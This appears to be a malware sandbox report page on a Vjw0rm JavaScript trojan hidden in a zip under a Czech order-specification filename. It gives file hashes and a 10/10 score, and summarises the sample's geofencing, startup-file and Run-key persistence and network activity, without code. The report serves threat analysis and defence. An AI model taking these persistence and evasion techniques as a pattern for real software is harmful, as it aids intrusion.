Overview

overview

10

Static

static

1

Specifikac...vky.js

windows7-x64

10

Specifikac...vky.js

windows10-2004-x64

10

Resubmissions

21-07-2023 10:49

230721-mw6a3aec65 10

21-07-2023 10:47

230721-mvvsyaec59 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    d1e0c6ab322c2c9a2bab04afde8cea05-sample.zip

  • Size

    17KB

  • Sample

    230721-mvvsyaec59

  • MD5

    52da0058b4d27255bf7ab352a7232a86

  • SHA1

    371beb3b18814af20d02ac1e200538b71065c74b

  • SHA256

    1cec95c97922a926105fe176ac71885f52b6ddfae8e0901f1c1c9e901f083363

  • SHA512

    e217adae3c34fa2a362bc8ac272425be0e399fba9d3dafd3b25f46b5249c8b5ac63246ee32fb56f22414d884d8036aba26639b90db656615465fe22a282cc793

  • SSDEEP

    384:navrH2e8p32QWDFesZByGoDBGXjPKaPdj+OjpBwhdc2rCkn:nkA2TcUyGYBGL/dq6ToW3kn

Score
10/10
vjw0rmpersistencetrojanworm

Malware Config

Targets

    • Target

      Specifikace objednvky.js

    • Size

      24KB

    • MD5

      4272d76e2efed7d323e14bccef987913

    • SHA1

      a8cde379b41cfafb036896484844620a7fcc11c6

    • SHA256

      39372ec10b2720511f8ca94e8aed43273c507637ec03f9a1eac279aadeb22c55

    • SHA512

      717ca100e5f2463b8aa675185e2dbd743a015fffe7654dab2b227691ed66e9443a3e387d31c3eeed63a22d1b3f77b213feec3c3fe6c1438ddf5313066f2583a9

    • SSDEEP

      384:0B+UO8kwlbBtHS0ihYvG3bMZcCOQHp4aIX6xEzWZNxFlumanjjjIYNFLD5zvOJ:09ewl7tGr+Oy4aPOL13IoFLdzGJ

    Score
    10/10
    vjw0rmpersistencetrojanworm

    • Vjw0rm

      Vjw0rm is a remote access trojan written in JavaScript.

      trojanwormvjw0rm

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops startup file

    • Adds Run key to start application

      persistence
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks